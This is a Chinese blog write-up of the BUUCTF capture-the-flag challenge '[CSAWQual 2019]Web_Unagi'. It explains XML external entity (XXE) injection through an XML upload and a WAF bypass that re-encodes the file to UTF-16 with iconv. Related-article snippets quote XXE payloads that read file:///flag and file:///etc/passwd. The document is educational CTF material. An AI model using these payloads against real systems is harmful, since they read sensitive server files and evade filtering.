BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,

最新推荐文章于 2024-09-16 21:55:23 发布
原创 最新推荐文章于 2024-09-16 21:55:23 发布 · 813 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客介绍了在BUUCTF中遇到的一道CSAWQual 2019 Web_Unagi题目,涉及XXE漏洞的利用。由于UTF8上传可能遇到WAF,作者采用了UTF16编码进行绕过。文章提到了如何通过PHP的伪协议如`php://filter`来执行命令,强调在遇到`file:///flag`不起作用的情况时可以尝试多种方法。博客的WP部分提示读者要从实战中学习,通过特定的XML语句实现文件上传。

二、学的的

  1. 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传
  2. 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,,
  3. 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了

三、 WP

初末

看一下iconv命令吧,总不能一个题什么都没学到东西啊,

语句:

iconv -f utf8 -t utf16 test.xml -o aaa.xml

这个语句弄上去,生成的文件上传也好使,


这个也行, 用了 Linux的标准输入输出而已,

iconv -f utf8 -t utf16 2.xml>1.xml

好了, 这两个语法够用了
在这里插入图片描述

最低0.47元/天 解锁文章
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1696
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 526
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
BUUCTF-Real-[PHP]XXE
分享
01-31 1452
BUUCTF-Real-[PHP]XXE漏洞复现!
buuctf [PHP]XXE
qq_1873822的博客
03-14 4528
原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息。仅仅是纯文本,有能力处理纯文本的软件都可以处理 XML。XML 允许创作者定义自己的标签和自己的文档结构。XML 是独立于软件和硬件的信息传输工具。所有现代浏览器都有读取和操作 XML 的内建 XML 解析器,但是不同的浏览器解析的方法不一样的,如在IE中使用loadXML()方法,在其他
xxe编码绕过(8-19)
Realiy的博客
08-19 1886
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
[CSAWQual 2019]Web_Unagi
snowlyzz的博客
09-13 255
xxe 绕过waf。
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1565
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
XXE的理解与绕过
weixin_50464560的博客
11-30 1906
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
buuctf-Real-[PHP-XXE]
weixin_46079186的博客
05-09 1508
题目地址 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 用burp抓包,在后方修改加入payload payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> &
buuctf 简单学习xxe
m0_46580995的博客
11-08 1400
buuctf 抓包发现可以xxe payload <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file://文件"> ]> <user> <username>&file;</username> <password>hack</password> </user&g
XXE和XML利用和绕过
qq_49078152的博客
07-19 1021
XXE和XML
buuCTF Real [php]XXE简单教程
wwwyydshen的博客
05-28 417
在做这个题的时候我习惯性的查看了一下上面的链接结果进入了Github中并且我还抓耳挠腮的找了好久的文件,结果呢毫无头绪,今天做了一道题后我突然有了个想法并且进行了尝试,果然还是运气好找到了解题的方法,并且这个方法特别简单(有点让我觉得之前的抓耳挠腮的样子有点可笑)哈哈哈废话不多说,上解题方式!我们看见上面有个链接,所以会下意识的点击那个链接(我觉得这个链接有点混淆视听了,搞不懂里面到底要找什么,所以这里我没有多做研究,但也研究了好久嘿嘿过程就不说了)进入后你会发现有一个php的文件页面。
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 1623
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE之读取任意文件 BUUCTF [PHP]XXE
最新发布
weixin_73049307的博客
09-16 870
ENTITY xxe SYSTEM "file:///etc/passwd" >]>改成"file:///phpinfo.php"也没显示出phpinfo.php文件内容,不知道怎么解决了。(注意:这里的POST的php文件名字必须是simplexml_load_string.php)直接Ctfl F搜索flag,发现还真有,尝试输入flag看看什么情况?发现是一段例子和介绍,将其复制到《XML基础知识之外部实体》一文中了。看到上面有个github的链接,点进去看看。很明显是个phpinfo.php文件。
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 3372
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
BUUCTF/BUU XXE COURSE 1
weixin_44041994的博客
03-22 1648
xxe全称是"xml external entity injection",意为xml外部实体注入。服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。通过brup suite抓包发现,数据包上传的是xml数据。随意输入数据并登录,发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag,闯关成功。
buuoj [PHP]XXE
pondzhang的专栏
05-04 1390
答案就在phpinfo()页面,无需通过xxe注入获得
------已搬运-------xxe入门学习--------BUUCTF:[NCTF2019]Fake(True) XML cookbook---------jarvisoj的API调用
Zero_Adam的博客
02-16 755
目录:一、XML基础知识:二、应用场景:例题:1. buu的[NCTF2019]Fake XML cookbook2. jarvisoj的API调用 一、XML基础知识: 这两个都不错 https://blog.youkuaiyun.com/gavin_john/article/details/51532756 https://blog.youkuaiyun.com/bylfsj/article/details/101441734 这个就离谱。直接xxe全部学完了,学精通了,,暂时不用看这个,, https://xz.aliyun
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 425
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
[CSAWQual 2019]Unagi
07-27
- *1* [[CSAWQual 2019]Web_Unagi xxe转码绕过waf](https://blog.youkuaiyun.com/qq_54929891/article/details/124481254)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值